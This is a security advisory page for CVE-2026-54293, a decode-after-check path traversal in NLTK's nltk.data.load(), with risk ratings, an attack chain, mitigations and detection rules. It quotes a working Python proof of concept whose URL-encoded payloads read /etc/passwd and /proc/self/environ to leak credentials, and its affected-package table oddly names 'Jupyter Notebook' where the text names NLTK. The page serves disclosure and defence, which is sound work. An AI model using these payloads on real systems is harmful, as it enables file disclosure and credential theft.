CVE-2026-54293: NLTK: path traversal leaks arbitrary local files

GHSA-p4gq-832x-fm9v HIGH
Published June 16, 2026
CISO Take

A decode-after-check flaw in NLTK's nltk.data.load() lets any unauthenticated attacker read arbitrary files from the host filesystem by URL-encoding path separators (%2f) and traversal segments, bypassing the library's documented security regex before url2pathname() decodes the payload into a real path. With CVSS 7.5, no authentication or user interaction required, and a working four-line PoC already public, exploitation is trivially accessible to script-level attackers — the EPSS top-86th-percentile rank and 2,954 downstream dependents mean the blast radius extends well beyond NLTK's direct install base across NLP APIs, ML preprocessing services, and hosted notebook environments. The /proc/self/environ read variant is the primary real-world risk: containerized ML deployments routinely store API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY), cloud provider credentials (AWS_SECRET_ACCESS_KEY), and database connection strings in the process environment, meaning a single crafted request can pivot to full cloud account compromise. No patch is available as of publication — immediately audit all code paths that pass user-controlled strings to nltk.data.load(), enforce strict allowlisting of permitted resource names, and apply OS-level sandboxing (seccomp, AppArmor, read-only mounts) to NLTK-processing components until a fix lands.

Sources: NVD EPSS GitHub Advisory OpenSSF ATLAS

What is the risk?

High risk. CVSS 7.5 with AV:N/AC:L/PR:N/UI:N makes this network-exploitable with zero authentication and trivial complexity. No official patch exists as of the CVE publication date, leaving the exposure window open-ended. The EPSS top-86th-percentile rank signals above-average exploitation likelihood despite a low absolute probability, reflecting NLTK's pervasive deployment across the NLP/ML ecosystem. The 2,954 downstream packages amplify true attack surface far beyond NLTK's direct installs. Risk is highest in multi-tenant ML platforms, SaaS NLP APIs, and hosted Jupyter/notebook services that accept user-supplied resource identifiers, where exploitation is one API call away from credential exfiltration and lateral movement to cloud infrastructure.

How does the attack unfold?

Target Discovery
Adversary identifies an NLTK-backed NLP API or ML service that exposes user-controlled resource identifiers as parameters passed to nltk.data.load().
AML.T0001
Payload Delivery
Attacker submits a crafted request with a URL-encoded path traversal payload (e.g., nltk:%2fproc%2fself%2fenviron) that passes the _UNSAFE_NO_PROTOCOL_RE regex undetected.
AML.T0049
Filesystem Access
url2pathname() decodes percent-encoded sequences post-regex-check, causing NLTK to open and return the contents of an arbitrary local file outside the intended corpus directory.
AML.T0037
Credential Exfiltration
Attacker extracts API keys, cloud provider credentials, and database connection strings from /proc/self/environ or application config files, enabling immediate lateral movement to cloud infrastructure.
AML.T0055

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Jupyter Notebook pip <= 3.9.4 No patch
13.2K OpenSSF 5.8 3.0K dependents Pushed 4d ago 56% patched ~454d to patch Full package profile →

Do you use Jupyter Notebook? You're affected.

How severe is it?

CVSS 3.1
7.5 / 10
EPSS
0.0%
chance of exploitation in 30 days
Higher than 14% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I None
A None

What should I do?

5 steps
  1. PATCH

    No official fix available as of 2026-06-16 — monitor NLTK GitHub advisory GHSA-p4gq-832x-fm9v and upgrade immediately when a patched release is published.

  2. ENFORCE MODE

    If your NLTK version exposes the pathsec flag, set nltk.pathsec.ENFORCE = True at application startup to enable stricter path enforcement.

  3. INPUT ALLOWLISTING

    Never pass external or user-supplied strings to nltk.data.load(); define an explicit allowlist of permitted NLTK resource names and validate all inputs against it before any load() call.

  4. SANDBOXING

    Run NLTK-processing components in OS-restricted environments — apply seccomp-bpf profiles, AppArmor/SELinux policies, and read-only filesystem mounts wherever possible to limit file access blast radius even if exploited.

  5. DETECTION

    Alert on file access to /proc/self/environ, /etc/passwd, /etc/shadow, ~/.ssh/, and application config directories from NLTK-running processes; scan application and proxy logs for nltk: URL scheme usage containing percent-encoded characters (%2f, %2e, %25).

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.3 - Information security in AI system development
NIST AI RMF
GOVERN 6.2 - Policies for third-party AI component risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-54293?

A decode-after-check flaw in NLTK's nltk.data.load() lets any unauthenticated attacker read arbitrary files from the host filesystem by URL-encoding path separators (%2f) and traversal segments, bypassing the library's documented security regex before url2pathname() decodes the payload into a real path. With CVSS 7.5, no authentication or user interaction required, and a working four-line PoC already public, exploitation is trivially accessible to script-level attackers — the EPSS top-86th-percentile rank and 2,954 downstream dependents mean the blast radius extends well beyond NLTK's direct install base across NLP APIs, ML preprocessing services, and hosted notebook environments. The /proc/self/environ read variant is the primary real-world risk: containerized ML deployments routinely store API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY), cloud provider credentials (AWS_SECRET_ACCESS_KEY), and database connection strings in the process environment, meaning a single crafted request can pivot to full cloud account compromise. No patch is available as of publication — immediately audit all code paths that pass user-controlled strings to nltk.data.load(), enforce strict allowlisting of permitted resource names, and apply OS-level sandboxing (seccomp, AppArmor, read-only mounts) to NLTK-processing components until a fix lands.

Is CVE-2026-54293 actively exploited?

No confirmed active exploitation of CVE-2026-54293 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-54293?

1. PATCH: No official fix available as of 2026-06-16 — monitor NLTK GitHub advisory GHSA-p4gq-832x-fm9v and upgrade immediately when a patched release is published. 2. ENFORCE MODE: If your NLTK version exposes the pathsec flag, set nltk.pathsec.ENFORCE = True at application startup to enable stricter path enforcement. 3. INPUT ALLOWLISTING: Never pass external or user-supplied strings to nltk.data.load(); define an explicit allowlist of permitted NLTK resource names and validate all inputs against it before any load() call. 4. SANDBOXING: Run NLTK-processing components in OS-restricted environments — apply seccomp-bpf profiles, AppArmor/SELinux policies, and read-only filesystem mounts wherever possible to limit file access blast radius even if exploited. 5. DETECTION: Alert on file access to /proc/self/environ, /etc/passwd, /etc/shadow, ~/.ssh/, and application config directories from NLTK-running processes; scan application and proxy logs for nltk: URL scheme usage containing percent-encoded characters (%2f, %2e, %25).

What systems are affected by CVE-2026-54293?

This vulnerability affects the following AI/ML architecture patterns: NLP processing pipelines, ML training pipelines, Hosted notebook environments, Multi-tenant ML serving platforms, AI data preprocessing pipelines.

What is the CVSS score for CVE-2026-54293?

CVE-2026-54293 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.04%.

What is the AI security impact?

Affected AI Architectures

NLP processing pipelinesML training pipelinesHosted notebook environmentsMulti-tenant ML serving platformsAI data preprocessing pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0037 Data from Local System
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.3
NIST AI RMF: GOVERN 6.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

### Summary nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. ### Affected Component nltk/data.py — find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check. Relevant occurrences: data.py L650–L653 — final path constructed from url2pathname(resource_name) after checks data.py L54–L69 — _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string data.py L219–L245 — normalize_resource_url() for nltk: scheme contributes to decode-after-check data.py L615–L618 — defense-in-depth traversal check also operates on undecoded input Root Cause The regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path. ### Proof of Concept ``` """ NLTK Arbitrary File Read via URL-Encoded Path Traversal ======================================================= Bypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py by URL-encoding path separators and traversal components. Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration) CWE: CWE-22 (Path Traversal) Root Cause: nltk/data.py:find() checks resource names against a regex for traversal patterns (../, leading /, etc.) BEFORE calling url2pathname() which decodes %xx sequences. This is a classic "decode-after-check" vulnerability. """ import sys import os import warnings # Suppress NLTK security warnings for clean PoC output warnings.filterwarnings("ignore", category=RuntimeWarning) # Setup sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk")) os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True) import nltk from nltk.pathsec import ENFORCE BANNER = """ =================================================== NLTK URL-Encoded Path Traversal PoC Affected: nltk <= 3.9.4 Default ENFORCE={enforce} =================================================== """.format(enforce=ENFORCE) def test_variant(name, payload, fmt="raw"): """Test a single traversal variant.""" try: content = nltk.data.load(payload, format=fmt) if isinstance(content, bytes): preview = content[:200].decode("utf-8", errors="replace") else: preview = content[:200] first_line = preview.split("\n")[0] print(f" [VULN] {name}") print(f" Payload: {payload}") print(f" Read OK: {first_line}") return True except Exception as e: print(f" [SAFE] {name}") print(f" Payload: {payload}") print(f" Blocked: {type(e).__name__}: {e}") return False def main(): print(BANNER) vulns = 0 # --- Variant 1: URL-encoded absolute path --- print("[1] URL-encoded absolute path (%2f = /)") if test_variant( "Encoded leading slash bypasses ^/ regex check", "nltk:%2fetc%2fpasswd", ): vulns += 1 print() # --- Variant 2: Encoded dot-dot traversal --- print("[2] URL-encoded dot-dot traversal (%2e = .)") if test_variant( "Encoded dots bypass \\.\\./ regex check", "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", ): vulns += 1 print() # --- Variant 3: Literal dots with encoded slash --- print("[3] Literal dots with encoded slash (..%2f)") if test_variant( "Encoded slash after literal .. bypasses \\.\\./ regex", "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", ): vulns += 1 print() # --- Variant 4: Read process environment (credential leak) --- print("[4] Read /proc/self/environ (credential leakage)") try: content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw") env_vars = content.decode("utf-8", errors="replace").split("\x00") print(f" [VULN] Leaked {len(env_vars)} environment variables") for var in env_vars[:3]: if var: key = var.split("=")[0] if "=" in var else var print(f" {key}=...") vulns += 1 except Exception as e: print(f" [SAFE] Blocked: {e}") print() # --- Control: verify normal traversal IS blocked --- print("[CONTROL] Verify literal ../ is blocked by regex") test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd") print() print("=" * 51) print(f" Result: {vulns} bypass variant(s) succeeded") if vulns > 0: print(" Status: VULNERABLE (url2pathname decodes after regex check)") else: print(" Status: Not vulnerable") print("=" * 51) if __name__ == "__main__": main() ``` ### Impact Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include: /etc/passwd, /etc/shadow (if readable) /proc/self/environ — leaks environment variables, often containing API keys, DB credentials, cloud secrets Application source code and configuration files Cloud metadata, deployment secrets, SSH keys This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.

Exploitation Scenario

An adversary targeting a SaaS text-classification or sentiment-analysis API built on NLTK submits a POST request with a crafted resource field set to nltk:%2fproc%2fself%2fenviron. The application passes this value directly to nltk.data.load() as a corpus identifier. The _UNSAFE_NO_PROTOCOL_RE regex inspects the undecoded string and finds no traversal patterns, allowing the call to proceed. url2pathname() then decodes %2f into / and %2e into ., resolving the path to /proc/self/environ on the host. NLTK opens and returns the raw file content, which the attacker receives in the API response — including AWS_ACCESS_KEY_ID, OPENAI_API_KEY, DATABASE_URL, and other secrets injected at container startup. The attacker pivots to cloud infrastructure within minutes using the harvested credentials. The entire attack requires no authentication, no prior reconnaissance beyond finding an NLTK-backed endpoint, and produces minimal application-level log evidence.

Weaknesses (CWE)

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Timeline

Published
June 16, 2026
Last Modified
June 16, 2026
First Seen
June 16, 2026

Related Vulnerabilities